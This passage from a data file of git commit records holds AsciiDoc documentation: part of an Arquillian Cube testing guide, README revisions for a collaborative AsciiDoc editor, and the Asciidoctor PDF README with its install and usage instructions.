_Shrinkwrap_).\nSo in fact the +Dockerfile+ should be templatized.\nAnd this is something that *Arquillian Cube* can do for you.\nThe idea is to create a file called +DockerfileTemplate+.\n\n[source, terminal]\n.src\/test\/resources\/daytime\/DockerfileTemplate\n----\nFROM java:7\n\nWORKDIR \/usr\/src\/server\nCOPY ${deployableFilename} \/usr\/src\/server\/${deployableFilename} #1\nEXPOSE 8080\nCMD [\"java\", \"-jar\", \"${deployableFilename}\"]\n----\n<1> +${deployableFilename}+ will be replaced at runtime by the name of the +jar+ file created by _Shrinkwrap_.\n\nThen we need to touch the +arquillian.xml+ file by setting a special container definition so *Arquillian* doesn't crash trying to deploy the archive into an undefined container.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\"> <!--1-->\n daytime:\n buildImage: <!--2-->\n dockerfileLocation: src\/test\/resources\/daytime <!--3-->\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\"> <!--4-->\n <configuration>\n <property name=\"containerlessDocker\">daytime<\/property> <!--5-->\n <property name=\"embeddedPort\">8080<\/property> <!--6-->\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> The Docker container is defined as per usual.\n<2> The +buildImage+ attribute is used to define the dockerfile
location.\n<3> This attribute sets the directory where the +Dockerfile+ is stored. In fact, in this case it is the directory where the +DockerfileTemplate+ file is stored.\n<4> A container provided by *Arquillian Cube* must be defined.\n<5> This property is used to set which container must be started.\n<6> This property sets the port exposed by the embedded server.\n\nAnd finally the test:\n\n[source, java]\n.DaytimeTest.java\n----\n@RunWith(Arquillian.class)\npublic class DaytimeTest {\n\n private static final String LINE_SEPARATOR = System\n .getProperty(\"line.separator\");\n\n @Deployment(testable = false) \/\/<1>\n public static JavaArchive createDeployment() {\n JavaArchive[] undertow = Maven.resolver().resolve(\"io.undertow:undertow-core:1.1.1.Final\").withTransitivity().as(JavaArchive.class); \/\/<2>\n\n JavaArchive jar = ShrinkWrap\n .create(JavaArchive.class, \"daytime.jar\")\n .addClass(DaytimeServer.class); \/\/<3>\n\n for (JavaArchive javaArchive : undertow) { \/\/<4>\n jar.merge(javaArchive);\n }\n\n jar.addAsManifestResource(\n new StringAsset(\n \"Main-Class: org.arquillian.cube.impl.containerless.DaytimeServer\"\n + LINE_SEPARATOR), \"MANIFEST.MF\"); \/\/<5>\n return jar;\n }\n\n @Test\n public void shouldReturnDateFromDaytimeServer(@ArquillianResource URL base) { \/\/<6>\n try (\n BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, notNullValue());\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> The _ShrinkWrap_ Maven resolver gets all dependencies for _Undertow_.\n<3> Create a +jar+ file called +daytime.jar+ with the +DaytimeServer+ class.\n<4> The +Undertow+ dependencies are merged inside the +jar+.\n<5> Because it is a runnable +jar+, the +MANIFEST+ is created accordingly.\n<6> Simple test.\n\n=== Polyglot Applications\n\nIn the previous section we have seen that we can test any _java_ _CLI_ application that offers a socket connection.\nBut if you think about it, there is nothing that prevents *Arquillian Cube* from deploying applications developed in other languages like _Node.js_, _Play_, _Ruby on Rails_, ...\n\nLet's see an example of how you can use *Arquillian Cube* to test a _Node.js_ _hello world_ application.\n\nThe first thing to do is create the _Node.js_ application.\n\n[source, json]\n.src\/main\/js\/package.json\n----\n{\n \"name\": \"helloworld-server\",\n \"version\": \"0.0.1\",\n \"description\": \"A NodeJS webserver to run inside a docker container\",\n \"author\": \"asotobu@gmail.com\",\n \"license\": \"APLv2\",\n \"dependencies\": {\n \"express\": \"*\"\n },\n \"scripts\": {\"start\": \"node index.js\"}\n}\n----\n\n[source, javascript]\n.src\/main\/js\/index.js\n----\nvar express = require('express');\n\nvar app = express();\n\napp.get('\/', function(req, res){\n res.send('Hello from inside a container!');\n});\n\napp.listen(8080);\n----\n\nThen we need to define a +DockerfileTemplate+ as we did for +Undertow+.\n\n[source]\n.src\/test\/resources\/node\/DockerfileTemplate\n----\nFROM node:0.11.14\n\nRUN mkdir -p \/usr\/src\/app\nWORKDIR \/usr\/src\/app\n\nADD ${deployableFilename} \/usr\/src\/app #1\nRUN npm install\nEXPOSE 8080\n\nCMD [ \"npm\", \"start\" ]\n----\n<1> We need to use the +ADD+ command to add the deployed file instead of +COPY+.
We are going to see why below.\n\nFinally the +arquillian.xml+ configuration file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\">\n node:\n buildImage:\n dockerfileLocation: src\/test\/resources\/node\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\">\n <configuration>\n <property name=\"containerlessDocker\">node<\/property> <!--1-->\n <property name=\"embeddedPort\">8080<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> This property is used to set which container must be started. In this case +node+.\n\nAnd finally the *Arquillian* test.\n\n[source, java]\n.NodeTest.java\n----\n@RunWith(Arquillian.class)\npublic class NodeTest {\n\n @Deployment(testable = false) \/\/<1>\n public static GenericArchive createDeployment() {\n return ShrinkWrap.create(GenericArchive.class, \"app.tar\") \/\/<2>\n .add(new ClassLoaderAsset(\"index.js\"), \"index.js\")\n .add(new ClassLoaderAsset(\"package.json\"), \"package.json\");\n }\n\n @Test\n public void shouldReturnMessageFromNodeJs(@ArquillianResource URL base) { \/\/<3>\n try (BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, is(\"Hello from inside a container!\"));\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> +GenericArchive+ with +tar+ extension must be created using _Shrinkwrap_.\n<3> Simple test.\n\nNOTE: +GenericArchive+ must end with +tar+ extension because it is expected by *Arquillian Cube*. 
When you use +ADD+ in a +Dockerfile+, _Docker_ will automatically untar the file to the given location.\n\n== Future work\n\nThe API will continuously evolve to fit the requirements of an enterprise application, as well as providing integration with _Kubernetes_ and other Docker related tools.\nAlso some configuration parameters will be modified to meet any new requirements.\nAlthough we are going to try not to break compatibility with previous versions, we cannot guarantee it until the _beta_ stage.\n\nFeel free to use it, and if you find a missing feature, a bug or anything else, feel free to add a new issue.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51cf9e0c4b3b5bb5098350ae366c111772b25ace","subject":"Add new features details","message":"Add new features details\n","repos":"mgreau\/when-websocket-met-asciidoctor,mgreau\/when-websocket-met-asciidoctor,mgreau\/when-websocket-met-asciidoctor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Real-time collaborative editor for Asciidoc files\nMaxime Greau <https:\/\/github.com\/mgreau[@mgreau]>\n:awestruct-layout: base \n:imagesdir: .\/doc\/img\n:idprefix:\n:idseparator: -\n:online-demo: http:\/\/wildfly-mgreau.rhcloud.com\/ad-editor\n:milestones: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\/milestones\n:issues: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\n:asciidoctor-url: http:\/\/asciidoctor.org\n:asciidoctorj-url: https:\/\/github.com\/asciidoctor\/asciidoctorj\n:wildfly-url: http:\/\/download.jboss.org\/wildfly\/8.0.0.CR1\/wildfly-8.0.0.CR1.zip\n\nYou can try the editor online at {online-demo} (running on OpenShift).\n\nThis project gives you the possibility to *work on the same AsciiDoc file with a team*.\n\nIt's based on the {asciidoctor-url}[Asciidoctor project] thanks to the Java API provided by {asciidoctorj-url}[AsciidoctorJ].\n\nimage::ad-editor-0.1.0-alpha2.png[Patch feature example]\n\n== 0.1.0-Alpha2 features\n\n* Create a *new space* OR *join other authors* with a spaceID\n* *Browser storage* with HTML5 IndexedDB for backup (save and load AsciiDoc source)\n* Fullscreen mode for HTML5 preview\n* Improved UI Design\n* Realtime HTML5 preview:\n** *each key entered* if you have clicked on +Render On Change+\n** *each time you press \"Alt+R\"* if you have clicked on the +Render On Alt+R+ button\n* *Patch feature*:\n** if another author sends a version, you can click on the +Compute Diff+ button to see differences between your adoc file and the last adoc file\n** if the patch seems ok, click on +Apply Patch+ and your adoc source will be up to date\n\n== Changelog\n\nYou can read all changes between each release in the link:CHANGELOG.adoc[changelog file].\n\n== Roadmap\n\nA lot of cool features are planned :) You can read all {issues}[open and closed issues] and {milestones}[milestones]\n\n== Install on your laptop\n\n[IMPORTANT]\n.Prerequisites\n====\n* JDK 7\n* Apache Maven 3.1\n====\n\n. Clone or download this github project (*+$APP_HOME+*)\n\n. Installing the Java EE 7 compliant app server \n.. Download {wildfly-url}[WildFly 8.0.0-CR1] (*+$JBOSS_HOME+*)\n.. Then you need to deploy the link:module\/README.adoc[Asciidoctor module] into your WildFly app server\n\n. Installing Bower\n.. Bower depends on Node and npm. It's installed globally using npm:\n \n npm install -g bower\n \n.. Installing the bower dependencies needed by this app\n\n cd $APP_HOME\n bower install\n \n. Build the WAR and test it in WildFly AS with maven\/arquillian:\n\n .. 
if the environment variable +$JBOSS_HOME+ is set:\n\n mvn clean package -Pwildfly-managed-arquillian\n\n .. if you haven't set the +$JBOSS_HOME+ env variable:\n\n mvn clean package -Pwildfly-managed-arquillian -DserverRoot=<path_to_the_server>\n \n. Deploy the app automatically with maven:\n\n .. if the app server is started\n \n mvn wildfly:deploy -Dmaven.test.skip=true\n \n .. if the app server isn't started\n \n mvn wildfly:run -Dmaven.test.skip=true -Djboss-as.home=<path_to_the_server>\n\n. Launch your browser and enjoy :)\n\n * http:\/\/localhost:8080\/ad-editor\n\n\n== Technology used\n\n* Asciidoctor project\n** AsciidoctorJ 0.1.4\n* Java EE 7 \n** CDI 1.1\n** WebSocket 1.0\n** JSON-P 1.0\n** EJB 3.2\n* Web Client\n** AngularJS 1.2.11\n** Ace Editor\n** Bootstrap 3.0\n* Tests\n** JUnit 4.8\n** Arquillian 1.1.2\n* Java EE 7 compliant app server\n\n","old_contents":"= Real-time collaborative editor for Asciidoc files\nMaxime Greau <https:\/\/github.com\/mgreau[@mgreau]>\n:awestruct-layout: base \n:imagesdir: .\/doc\/img\n:idprefix:\n:idseparator: -\n:online-demo: http:\/\/wildfly-mgreau.rhcloud.com\/ad-editor\n:milestones: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\/milestones\n:issues: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\n:asciidoctor-url: http:\/\/asciidoctor.org\n:asciidoctorj-url: https:\/\/github.com\/asciidoctor\/asciidoctorj\n:wildfly-url: http:\/\/download.jboss.org\/wildfly\/8.0.0.CR1\/wildfly-8.0.0.CR1.zip\n\nYou can try the editor online at {online-demo} (running on OpenShift).\n\nThis project gives you the possibility to *work on the same AsciiDoc file with a team*.\n\nIt's based on the {asciidoctor-url}[Asciidoctor project] thanks to the Java API provided by {asciidoctor-url}[AsciidoctorJ].\n\nimage::patch-demo.png[Patch feature example]\n\n== 0.1.0-Alpha2 features\n\n* By default when you click on +connect+, you are a +*reader*+ :\n** It means that you can see what happens on HTML5 preview but you can't send any source version\n* When you +add a name+ and click to +Enable editor+, you become a +*writer*+ :\n** so you can update the asciidoc source in realtime and automatically view HTML 5 rendered :\n*** *each time you write something* if you have clicked on +Send On Change+\n*** *each time you press \"Ctrl+S\"* if you have clicked on +Send On Ctrl+S+ button\n* You can *patch your file with the latest asciidoc source*:\n** if an other author send a version, you can click on +Compute Diff+ button to see differences between your adoc file and the last adoc file\n** if the patch seems ok, click on +Apply Patch+ and you adoc source will be up to date\n* *Several people can work* on the same doc\n** you can see the number of writers (people who send adoc file)\n** you can see the name of the last author\n** ypu can see the numbr of readers (people who don't send an asciidoc source)\n\n\n\n== Changelog\n\nYou can read all changes between each release in the link:CHANGELOG.adoc[changelog file].\n\n== Roadmap\n\nA lot of cool features are planned :) You can read all {issues}[open and closed issues] and {milestones}[milestones]\n\n\n\n== Install on your laptop\n\n[IMPORTANT]\n.Prerequisites\n====\n* JDK 7\n* Apache Maven 3.1\n====\n\n. Clone or download this github project (*+$APP_HOME+*)\n\n. Installing the Java EE 7 Compliance App server \n.. Download {wildfly-url}[WildFly 8.0.0-CR1] (*+$JBOSS_HOME+*)\n.. Then you need to deploy the link:module\/README.adoc[Asciidoctor module] into your WildFly app server\n\n. 
Installing Bower\n.. Bower depends on Node and npm. It's installed globally using npm:\n \n npm install -g bower\n cd $APP_HOME\n bower install\n choose AngularJS 2.11\n \n. Build the WAR and test it into WildFly AS with maven\/arquillian : \n\n .. if the environement variable +$JBOSS_HOME+ is set :\n\n mvn clean package -Pwildfly-managed-arquillian\n\n .. if you haven't set the +$JBOSS_HOME+ env variable :\n\n mvn clean package -Pwildfly-managed-arquillian -DserverRoot=<path_to_the_server>\n \n. Deploy the app automatically with maven : \n\n .. if the app server is started\n \n mvn wildfly:deploy -Dmaven.test.skip=true\n \n .. if the app server isn't started\n \n mvn wildfly:run -Djboss-as.home=<path_to_the_server>\n\n. Launch your browser and enjoy :)\n\n * http:\/\/localhost:8080\/ad-editor\n\n\n== Technology used\n\n* Asciidoctor project\n** AsciidoctorJ 0.1.4\n* Java EE 7 \n** CDI 1.1\n** WebSocket 1.0\n** JSON-P 1.0\n** EJB 3.2\n* Web Client\n** AngularJS 1.2.11\n** Ace Editor\n** Bootstrap 3.0\n* Tests\n** JUnit 4.8\n** Arquillian 1.1.2\n* Java EE 7 Compliance App server\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a8ddbf17567aa81dd03a57347a9a03c84c67d04","subject":"explain the asciidoctor-pdf command in more detail","message":"explain the asciidoctor-pdf command in more detail\n","repos":"Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Asciidoctor PDF: A native PDF converter for AsciiDoc\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>; Sarah White <https:\/\/github.com\/graphitefriction[@graphitefriction]>\n\/\/ Settings:\n:compat-mode!:\n:experimental:\n:idprefix:\n:idseparator: -\n:icons: font\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n:pagenums:\n\/\/:pdf-page-size: [8.25in, 11.69in]\n\/\/:pdf-page-size: A4\nifdef::env-browser[:toc: preamble]\n\/\/ Aliases:\n:project-name: Asciidoctor PDF\n:project-handle: asciidoctor-pdf\n\/\/ URIs:\n\/\/ifdef::env-github[:relfileprefix: \/blob\/master\/]\n:uri-project: https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n:uri-project-repo: {uri-project}\n:uri-project-issues: {uri-project-repo}\/issues\n:uri-project-list: http:\/\/discuss.asciidoctor.org\n:uri-prawn: http:\/\/prawn.majesticseacreature.com\n:uri-rvm: http:\/\/rvm.io\n:uri-asciidoctor: http:\/\/asciidoctor.org\n\n_Lo and behold_, a native PDF converter for AsciiDoc built with {uri-asciidoctor}[Asciidoctor] and {uri-prawn}[Prawn]! 
+\n_No more middleman._ +\n_No more DocBook toolchain._ +\nIt's AsciiDoc straight to PDF!\n\n[caption=Status]\nCAUTION: {project-name} is currently _alpha_ software.\nWhile the converter handles most AsciiDoc content, there's still work needed to fill in gaps where conversion is incomplete, incorrect or not implemented.\nSee the milestone v1.5.0 in the {uri-project-issues}[issue tracker] for details.\n\n== Prawn, the majestic PDF generator\n\n{uri-project}[{project-name}] is made possible by an amazing Ruby gem named Prawn.\nAnd what a gem it is!\n\n{uri-prawn}[Prawn] is a nimble PDF writer for Ruby.\nMore important, it's a hackable platform that offers both high level APIs for the most common needs and low level APIs for bending the document model to accommodate special circumstances.\n\nWith Prawn, you can write text, draw lines and shapes and place images _anywhere_ on the page and add as much color as you like.\nIn addition, it brings a fluent API and aggressive code re-use to the printable document space.\n\nHere's an example that demonstrates how to use Prawn to create a basic PDF document.\n\n.Create a basic PDF document using Prawn\n[source,ruby]\n----\nrequire 'prawn'\n\nPrawn::Document.generate 'output.pdf' do\n text 'Hello, PDF creation!'\nend\n----\n\nIt's that easy.\nAnd that's just the beginning.\nSkip ahead to <<getting-started,Getting started>> to start putting it use.\n\nPrawn is the _killer library_ for PDF generation we've needed to close this critical gap in Asciidoctor.\nIt absolutely takes the pain out of creating printable documents.\nPicking up from there, {project-name} takes the pain out of creating PDF documents _from AsciiDoc_.\n\n== Features\n\n=== Notable features\n\n* Direct AsciiDoc to PDF conversion\n* <<docs\/theming-guide.adoc#,Configuration-driven style and layout>>\n* PDF document outline (i.e., bookmarks)\n* Table of contents page(s)\n* Document metadata (title, authors, subject, keywords, etc)\n* Internal cross reference links\n* Syntax highlighting with CodeRay or Pygments\n* Page numbering\n* Customizable running content (header and footer)\n* \u201cKeep together\u201d blocks (i.e., page breaks avoided in certain block content)\n* Orphan section titles avoided\n* Table border settings honored\n* Font-based icons\n* Custom fonts\n\n=== Missing features\n\nSee <<WORKLOG.adoc#,WORKLOG>>.\n\n== Prerequisites\n\nAll that's needed is Ruby (1.9.3 or above; 2.2.x recommended) and a few Ruby gems, which we explain how to install in the next section.\n\n[WARNING]\n====\nPrawn 2.0.0 and above requires Ruby >= 2.0.0 at installation (though it still works with Ruby 1.9.3 once you get beyond installation).\nIf you need to use Asciidoctor PDF with Ruby 1.9.3, you must first install Prawn 1.3.0 using:\n\n $ gem install prawn --version 1.3.0\n\nYou can then proceed with installation of Asciidoctor PDF.\n====\n\nTo check you have Ruby available, use the `ruby` command to query the version installed:\n\n $ ruby --version\n\n== Getting started\n\nYou can get {project-name} by <<install-the-published-gem,installing the published gem>> or <<development,running the code from source>>.\n\n=== Install the published gem\n\n{project-name} is published in pre-release on RubyGems.org.\nYou can install the published gem using the following command:\n\n $ gem install --pre asciidoctor-pdf\n \nIf you want to syntax highlight source listings, you'll also want to install CodeRay, Rouge or Pygments.\nChoose one (or more) of the following:\n\n.CodeRay\n $ gem install 
coderay\n\n.Rouge\n $ gem install rouge\n\n.Pygments\n $ gem install pygments.rb\n \nYou then activate syntax highlighting for a given document by adding the following attribute to the document header (CodeRay shown):\n\n[source,asciidoc]\n----\n:source-highlighter: coderay \n----\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script:\n\n $ asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}.\n\nLet's grab an AsciiDoc document to distill and start putting {project-name} to use!\n\n=== An example AsciiDoc document\n\nIf you don't already have an AsciiDoc document, you can use the [file]_basic-example.adoc_ file found in the examples directory of this project.\n\nifeval::[{safe-mode-level} >= 20]\nSee <<examples\/basic-example.adoc#,basic-example.adoc>>.\nendif::[]\nifeval::[{safe-mode-level} < 20]\n.basic-example.adoc\n[source,asciidoc]\n....\ninclude::examples\/basic-example.adoc[]\n....\nendif::[]\n\nIt's time to convert the AsciiDoc document directly to PDF.\n\n=== Convert AsciiDoc to PDF\n\nIMPORTANT: You'll need the `coderay` gem installed to run this example since it uses the `source-highlighter` attribute with the value of `coderay`.\n\nConverting to PDF is as simple as running the `asciidoctor-pdf` script using Ruby and passing our AsciiDoc document as the first argument.\n\n $ asciidoctor-pdf basic-example.adoc\n\nThis command is just a shorthand way of running:\n\n $ asciidoctor -r asciidoctor-pdf -b pdf basic-example.adoc\n\nThe `asciidoctor-pdf` command just saves you from having to remember all those flags.\nThat's why we created it.\n\nWhen the script completes, you should see the file [file]_basic-example.pdf_ in the same directory.\nOpen the [file]_basic-example.pdf_ file with a PDF viewer to see the result.\n\n.Example PDF document rendered in a PDF viewer\nimage::examples\/example-pdf-screenshot.png[Screenshot of PDF document,width=800,scaledwidth=100%]\n\nYou're also encouraged to try converting this <<README#,README>> as well as the documents in the examples directory to see more of what {project-name} can do.\n\nThe pain of the DocBook toolchain should be melting away about now.\n\n== Themes\n\nThe layout and styling of the PDF is driven by a YAML configuration file.\nTo learn how the theming system works and how to create and apply custom themes, refer to the <<docs\/theming-guide.adoc#,Asciidoctor PDF Theme Guide>>.\nYou can use the built-in theme files, which you can find in the [file]_data\/themes_ directory, as examples.\n\n== Font-based Icons\n\nYou can use icons in your PDF document using any of the following icon sets:\n\n* *fa* - https:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome^] (default)\n* *octicon* - https:\/\/octicons.github.com\/[Octicons^]\n* *fi* - http:\/\/zurb.com\/playground\/foundation-icon-fonts-3[Foundation Icons^]\n* *pf* - http:\/\/paymentfont.io\/[Payment font^]\n\nYou can enable font-based icons by setting the following attribute in the header of your document:\n\n[source,asciidoc]\n----\n:icons: font\n----\n\nIf you want to override the font set globally, also set the `icon-set` attribute:\n\n[source,asciidoc]\n----\n:icons: font\n:icon-set: pf\n----\n\nHere's an example that shows how to use the Amazon icon from the payment font (pf) icon set in a sentence:\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[].\n----\n\nYou can use the `set` attribute on the icon macro to override the icon set for a given 
icon.\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[set=pf].\n----\n\nIn addition to the sizes supported in the HTML backend (lg, 1x, 2x, etc), you can enter any relative value in the size attribute (e.g., 1.5em, 150%, etc).\n\n[source,asciidoc]\n----\nicon:android[size=40em]\n----\n\nYou can enable use of fonts during PDF generation (instead of in the document header) by passing the `icons` attribute to the `asciidoctor-pdf` command.\n\n $ asciidoctor-pdf -a icons=font -a icon-set=octicon sample.adoc\n\nIcon-based fonts are handled by the `prawn-icon` gem.\nTo find a complete list of available icons, consult the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon] repository.\n\n== Optional scripts\n\n{project-name} also provides a shell script that invokes GhostScript (`gs`) to optimize and compress the generated PDF with minimal impact on quality.\nYou must have Ghostscript installed to use it.\n\nHere's an example usage:\n\n $ .\/bin\/optimize-pdf basic-example.pdf\n\nThe command will generate the file [file]_example-optimized.pdf_ in the current directory.\n\nWARNING: The `optimize-pdf` script currently requires a Bash shell (Linux, OSX, etc).\nWe plan to rewrite the script in Ruby so it works across platforms (see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/1[issue #1])\n\nIMPORTANT: The `optimize-pdf` script relies on Ghostscript >= 9.10.\nOtherwise, it may actually make the PDF larger.\nAlso, you should only consider using it if the file size of the original PDF is > 5MB.\n\nIf a file is found with the extension `.pdfmarks` and the same rootname as the input file, it is used to add metadata to the generated PDF document.\nThis file is necessary to preserve the document metadata since Ghostscript will otherwise drop it.\nThat's why {project-name} always creates this file in addition to the PDF.\n\n== Contributing\n\nIn the spirit of free software, _everyone_ is encouraged to help improve this project.\n\nTo contribute code, simply fork the project on GitHub, hack away and send a pull request with your proposed changes.\n\nFeel free to use the {uri-project-issues}[issue tracker] or {uri-project-list}[Asciidoctor mailing list] to provide feedback or suggestions in other ways.\n\n== Development\n\nTo help develop {project-name}, or to simply use the development version, you need to get the source from GitHub.\nFollow the instructions below to learn how to clone the source and run it from your local copy.\n\n=== Retrieve the source code\n\nYou can retrieve the source of {project-name} in one of two ways:\n\n. Clone the git repository\n. 
Download a zip archive of the repository\n\n==== Option 1: Fetch using git clone\n\nIf you want to clone the git repository, simply copy the {uri-project-repo}[GitHub repository URL] and pass it to `git clone` command:\n\n $ git clone https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n\nNext, change to the project directory:\n\n $ cd asciidoctor-pdf\n\n==== Option 2: Download the archive\n\nIf you want to download a zip archive, click the btn:[Download Zip] button on the right-hand side of the repository page on GitHub.\nOnce the download finishes, extract the archive, open a console and change to that directory.\n\nTIP: Instead of working out of the {project-handle} directory, you can simply add the absolute path of the [path]_bin_ directory to your `PATH` environment variable.\n\nWe'll leverage the project configuration to install the necessary dependencies.\n\n=== Install dependencies\n\nIf you're using {uri-rvm}[RVM], we recommend creating a new gemset to work with {project-name}:\n\n $ rvm use 2.2@asciidoctor-pdf --create\n\nWe like RVM because it keeps the dependencies required by various projects isolated.\n\nThe dependencies needed to use {project-name} are defined in the [file]_Gemfile_ at the root of the project.\nWe can use Bundler to install the dependencies for us.\n\nTo check you have Bundler available, use the `bundle` command to query the version installed:\n\n $ bundle --version\n\nIf it's not installed, use the `gem` command to install it.\n\n $ gem install bundler\n\nThen use the `bundle` command to install the project dependencies:\n\n $ bundle\n\nNOTE: You need to call `bundle` from the project directory so that it can find the [file]_Gemfile_.\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script using Ruby:\n\n $ ruby .\/bin\/asciidoctor-pdf -v\n\nor\n\n $ bundle exec .\/bin\/asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}!\n\nCAUTION: If you get an error message--and you're not using a Ruby manager like RVM--you may need to invoke the script through `bundle exec`:\nFor best results, be sure to always use `bundle exec` whenever invoking the `.\/bin\/asciidoctor-pdf` script in development mode.\n\n[[resources,Links]]\n== Resources\n\n* https:\/\/groups.google.com\/forum\/#!msg\/prawn-ruby\/MbMsCx862iY\/6ImCsvLGfVcJ[Discussion about image quality in PDFs]\n\n== Authors\n\n{project-name} was written by https:\/\/github.com\/mojavelinux[Dan Allen] and https:\/\/github.com\/graphitefriction[Sarah White] of OpenDevise Inc. on behalf of the Asciidoctor Project.\n\n== Copyright\n\nCopyright (C) 2014-2015 OpenDevise Inc. 
and the Asciidoctor Project.\nFree use of this software is granted under the terms of the MIT License.\n\nFor the full text of the license, see the <<LICENSE.adoc#,LICENSE>> file.\nRefer to the <<NOTICE.adoc#,NOTICE>> file for information about third-party Open Source software in use.\n","old_contents":"= Asciidoctor PDF: A native PDF converter for AsciiDoc\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>; Sarah White <https:\/\/github.com\/graphitefriction[@graphitefriction]>\n\/\/ Settings:\n:compat-mode!:\n:experimental:\n:idprefix:\n:idseparator: -\n:icons: font\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n:pagenums:\n\/\/:pdf-page-size: [8.25in, 11.69in]\n\/\/:pdf-page-size: A4\nifdef::env-browser[:toc: preamble]\n\/\/ Aliases:\n:project-name: Asciidoctor PDF\n:project-handle: asciidoctor-pdf\n\/\/ URIs:\n\/\/ifdef::env-github[:relfileprefix: \/blob\/master\/]\n:uri-project: https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n:uri-project-repo: {uri-project}\n:uri-project-issues: {uri-project-repo}\/issues\n:uri-project-list: http:\/\/discuss.asciidoctor.org\n:uri-prawn: http:\/\/prawn.majesticseacreature.com\n:uri-rvm: http:\/\/rvm.io\n:uri-asciidoctor: http:\/\/asciidoctor.org\n\n_Lo and behold_, a native PDF converter for AsciiDoc built with {uri-asciidoctor}[Asciidoctor] and {uri-prawn}[Prawn]! +\n_No more middleman._ +\n_No more DocBook toolchain._ +\nIt's AsciiDoc straight to PDF!\n\n[caption=Status]\nCAUTION: {project-name} is currently _alpha_ software.\nWhile the converter handles most AsciiDoc content, there's still work needed to fill in gaps where conversion is incomplete, incorrect or not implemented.\nSee the milestone v1.5.0 in the {uri-project-issues}[issue tracker] for details.\n\n== Prawn, the majestic PDF generator\n\n{uri-project}[{project-name}] is made possible by an amazing Ruby gem named Prawn.\nAnd what a gem it is!\n\n{uri-prawn}[Prawn] is a nimble PDF writer for Ruby.\nMore important, it's a hackable platform that offers both high level APIs for the most common needs and low level APIs for bending the document model to accommodate special circumstances.\n\nWith Prawn, you can write text, draw lines and shapes and place images _anywhere_ on the page and add as much color as you like.\nIn addition, it brings a fluent API and aggressive code re-use to the printable document space.\n\nHere's an example that demonstrates how to use Prawn to create a basic PDF document.\n\n.Create a basic PDF document using Prawn\n[source,ruby]\n----\nrequire 'prawn'\n\nPrawn::Document.generate 'output.pdf' do\n text 'Hello, PDF creation!'\nend\n----\n\nIt's that easy.\nAnd that's just the beginning.\nSkip ahead to <<getting-started,Getting started>> to start putting it use.\n\nPrawn is the _killer library_ for PDF generation we've needed to close this critical gap in Asciidoctor.\nIt absolutely takes the pain out of creating printable documents.\nPicking up from there, {project-name} takes the pain out of creating PDF documents _from AsciiDoc_.\n\n== Features\n\n=== Notable features\n\n* Direct AsciiDoc to PDF conversion\n* <<docs\/theming-guide.adoc#,Configuration-driven style and layout>>\n* PDF document outline (i.e., bookmarks)\n* Table of contents page(s)\n* Document metadata (title, authors, subject, keywords, etc)\n* Internal cross reference links\n* Syntax 